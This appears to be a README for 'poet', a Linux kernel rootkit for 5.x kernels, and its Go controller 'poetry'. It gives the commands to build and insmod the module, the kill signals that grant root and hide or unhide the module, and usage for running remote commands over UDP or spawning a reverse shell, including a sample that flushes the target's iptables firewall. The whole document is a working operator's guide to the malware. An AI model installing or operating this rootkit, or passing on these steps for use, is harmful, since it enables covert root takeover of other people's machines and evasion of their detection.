This is a Linux kernel module rootkit made for >=5.X. It features privilege escalation, module hiding, and RCE/reverse shell capabilities.
- 5.4.0
- 5.13.0
# install needed packages
apt update
apt install build-essential \
checkinstall \
linux-headers-$(uname -r) \
cd lkm/
# comment out the printk debug statements
sed -i 's/debug=1/debug=0/g' poet.c
# compile the kernel module with the corresponding headers
The compiled LKM will be: poet.ko
# install the kernel module on the system
sudo insmod poet.ko
kill -35 0 # escalate to root
kill -36 0 # hide poet module
kill -37 0 # unhide poet module
To use the RCE section of the rootkit:
Usage of ./poetry:
-c string
Choice: Single command to run through UDP. No output.
-r string
Optional: Where to send the shell. Defaults to interface IP if not specified.
-s Choice: Spawn and connect to reverse shell
-t string
Required: IP address to target
The server can be compiled and run through Docker.
cd srv/
docker build -t poetry .
docker run poetry # run without args to see usage
# you must specify the -r option here when using the reverse shell capability. This will be the IP of the machine running the docker container.
docker run -itp 7337:7337 poetry -t -r -s
docker run poetry -t -c "iptables -F"
Secondary option.
Docker must be installed in order to statically compile the server binary.
cd srv/
make # compile the go binary
ls out/ # compiled binary will be in the out/ directory
cd srv/
# compile the server binary
go build
The compiled binary will be called: poetry
Copy the compiled binary to the host system. Run the following commands to interact with the target:
export IFACE=<ethernet_interface> # set interface env var
sudo -E ./poetry -t <target_ip> -s # -s attempts to spawn a reverse tcp shell
sudo -E ./poetry -t <target_ip> -c "<command>" # -c sends a single command through udp. no output